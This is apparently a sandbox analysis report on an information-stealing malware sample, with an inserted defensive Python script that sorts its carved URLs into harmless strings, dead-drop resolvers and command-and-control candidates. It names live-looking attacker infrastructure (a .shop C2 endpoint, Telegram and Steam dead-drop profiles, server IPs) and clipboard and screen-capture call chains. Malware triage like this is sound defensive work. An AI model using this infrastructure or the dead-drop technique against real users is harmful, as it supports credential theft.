Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000567000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.com
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.com/
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.com/P_
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000567000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://stadiatechnologies.comntent-Disposition:
Source: Amcache.hve.33.dr String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, HDAFIIDAKJ.exe.29.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1426905335.000000006CBBD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.1426312746.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1399562953.000000001B63E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1943907695.000000002450D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1937546619.000000001E56E000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.29.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/T
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api.
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api45
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/apip
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/apitK
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: https://mozilla.org0/
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: IJKJJK.29.dr String found in binary or memory: https://support.mozilla.org
Source: IJKJJK.29.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJKJJK.29.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/(
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/9
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/iyigunl
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.000000000044C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002E.00000002.2205091531.000000000045A000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/jamelwt
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/jamelwt#cp
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/jamelwtkwnvfdhttps://steamcommunity.com/profiles/76561199761128941b
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/nLbZ
Source: RegAsm.exe, 0000002E.00000002.2206607255.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: RegAsm.exe, 0000001D.00000002.1944158611.000000002492D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1948243243.000000002A890000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1959106778.000000003676F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1966611743.000000004264F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.3.dr, softokn3[1].dll.29.dr, freebl3.dll.3.dr, freebl3[1].dll.29.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, HDAFIIDAKJ.exe.29.dr, 66cf75d3791d7_vrewqgq[1].exe.3.dr, 66cf818156193_ldjfnsfd[1].exe.3.dr, userFBKFCFBFID.exe.3.dr, userIEHDAFHDHC.exe.3.dr, DHCGHDHIDH.exe.29.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.1411146244.00000000276B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1929039688.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, JKFIDG.29.dr, KJJJKFIIIJJJECAAEHDB.3.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IJKJJK.29.dr String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: IJKJJK.29.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: IJKJJK.29.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/chost.exe
Source: GIJEGDAKEHJECAKEGDHJDHDAFH.3.dr, IJKJJK.29.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IJKJJK.29.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1382432761.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.1936827906.000000001E0AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/YSAESCTrC.exe
Source: RegAsm.exe, 0000001D.00000002.1926386102.0000000000490000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: GIJEGDAKEHJECAKEGDHJDHDAFH.3.dr, IJKJJK.29.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49740 version: TLS 1.2
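Most of the URL rows above are noise the stealer carries in rather than its own configuration: the mozilla.org, sqlite.org, digicert.com and entrust.net strings come from the dropped NSS libraries (nss3.dll, mozglue.dll, freebl3.dll, softokn3.dll) and from code-signing certificate chains, and the ecosia, duckduckgo and yahoo strings are search-engine defaults read out of harvested browser profile files (the .dr sources). The rows worth keeping are the ones the report attributes to process memory only: condedqpwqm.shop/api, which matches the Lumma C2 endpoint pattern, and the steamcommunity.com/profiles and t.me strings, since Vidar is documented to fetch its live C2 address from a Steam profile page or a Telegram channel. The two TLS peers fit the same picture: 172.67.146.35 is in Cloudflare's 172.67.0.0/16 (the .shop domain is Cloudflare-fronted) and 149.154.167.99 is in Telegram's 149.154.160.0/20. The script below is an added example, not part of the report or of any sandbox vendor's tooling; it parses rows of exactly this format, recovers hostnames from the over-run carved strings, splits each Source field into process names, memory-dump process indexes and dropped files, and buckets hosts with an allow-list and a dead-drop list that are assumptions of the example. The rule that the first field of a .sdmp name is the hex process index is also an assumption, checked here against the report (0x1D = 29 lines up with the 29.2.RegAsm.exe rows).

```python
"""Triage of sandbox 'String found in binary or memory' and HTTPS rows.
Added example; not part of the report or of any sandbox vendor's tooling."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

STRING_ROW = re.compile(
    r"^Source: (?P<sources>.+?) String found in binary or memory: (?P<url>\S+)$")
TLS_ROW = re.compile(
    r"^Source: unknown HTTPS traffic detected: (?P<ip>[\d.]+):(?P<port>\d+) -> "
    r"(?P<client>[\d.]+):(?P<cport>\d+) version: (?P<tls>.+)$")

# Assumed allow-list: hosts a stealer carries in through bundled NSS/browser DLLs,
# harvested browser profiles and code-signing certificate chains, not its config.
BENIGN_SUFFIXES = (
    "mozilla.org", "mozilla.com", "sqlite.org", "digicert.com", "entrust.net",
    "ecosia.org", "duckduckgo.com", "yahoo.com", "google.com", "cloudflare.com",
    "amazon.com", "admarketplace.net", "ap01.net", "mt48.net", "invisalign.com")
# Public services the Vidar family is documented to use as dead-drop resolvers.
DEAD_DROP_HOSTS = ("t.me", "web.telegram.org", "steamcommunity.com")
# Assumed owner table for the TLS peers seen in this report (well-known ranges).
OWNER_RANGES = {"172.67.0.0/16": "Cloudflare", "149.154.160.0/20": "Telegram"}

# Constructed sample: rows copied from the report, source lists abbreviated.
SAMPLE_ROWS = """\
Source: RegAsm.exe, 00000018.00000002.1483311475.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api
Source: RegAsm.exe, 00000029.00000002.1938989194.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://condedqpwqm.shop/api.
Source: userIEHDAFHDHC.exe, 0000001B.00000002.1383374725.00000000038B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 0000001D.00000002.1926386102.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/jamelwt#cp
Source: nss3[1].dll.3.dr, mozglue.dll.3.dr String found in binary or memory: https://mozilla.org0/
Source: BAAEHD.29.dr, AECFCAAE.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown HTTPS traffic detected: 172.67.146.35:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49730 version: TLS 1.2
"""


def normalize_host(url):
    """Carved strings overrun the URL ('/api.', 'mozilla.org0'). TLD labels are
    alphabetic, so dropping non-letters from the last label recovers the host."""
    labels = (urlsplit(url).hostname or "").lower().split(".")
    labels[-1] = re.sub(r"[^a-z]", "", labels[-1])
    return ".".join(l for l in labels if l)


def classify_sources(sources):
    """Split a Source field into process names, process indexes and dropped files.
    Assumption: the first field of a .sdmp name is the hex process index (0x1D here
    matches the report's 29.2.RegAsm.exe rows)."""
    procs, proc_ids, dropped = set(), set(), set()
    for tok in (t.strip() for t in sources.split(",")):
        if tok.endswith(".sdmp"):
            proc_ids.add(int(tok.split(".")[0], 16))
        elif tok.endswith(".dr"):
            dropped.add(tok)
        elif tok:
            procs.add(tok)
    return procs, proc_ids, dropped


def bucket(host):
    def under(domains):
        return any(host == d or host.endswith("." + d) for d in domains)
    if under(DEAD_DROP_HOSTS):
        return "dead_drop"
    return "benign" if under(BENIGN_SUFFIXES) else "c2_candidate"


def owner_of(ip):
    addr = ipaddress.ip_address(ip)
    return next((name for net, name in OWNER_RANGES.items()
                 if addr in ipaddress.ip_network(net)), "unknown")


def triage(report_text):
    hosts = defaultdict(lambda: {"bucket": "", "urls": set(), "processes": set(),
                                 "proc_ids": set(), "dropped": set()})
    peers = defaultdict(lambda: {"owner": "", "sessions": []})
    for line in report_text.splitlines():
        if m := STRING_ROW.match(line):
            host = normalize_host(m["url"])
            if not host:
                continue
            procs, proc_ids, dropped = classify_sources(m["sources"])
            rec = hosts[host]
            rec["bucket"] = bucket(host)
            rec["urls"].add(m["url"])
            rec["processes"] |= procs
            rec["proc_ids"] |= proc_ids
            rec["dropped"] |= dropped
        elif m := TLS_ROW.match(line):
            peers[m["ip"]]["owner"] = owner_of(m["ip"])
            peers[m["ip"]]["sessions"].append((int(m["cport"]), m["tls"]))
    return {"hosts": dict(hosts), "peers": dict(peers)}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for host, rec in sorted(result["hosts"].items(), key=lambda kv: kv[1]["bucket"]):
        print(f"{rec['bucket']:13} {host:22} pids={sorted(rec['proc_ids'])} "
              f"files={sorted(rec['dropped'])}")
    for ip, rec in result["peers"].items():
        print(f"{ip:16} {rec['owner']:11} {rec['sessions']}")
```

Run against the full report text, the process indexes are the useful part: condedqpwqm.shop shows up only in processes 0x18 and 0x29, the two RegAsm.exe instances whose 0x400000 regions carry the injected payloads, while the dead-drop URLs sit in process 0x1D and in userIEHDAFHDHC.exe before it injects. A host that lands in c2_candidate but is sourced only from .dr files deserves a second look before it goes on a block list, since it may just be a harvested bookmark.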
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 24_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00418AB0 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00418AB0
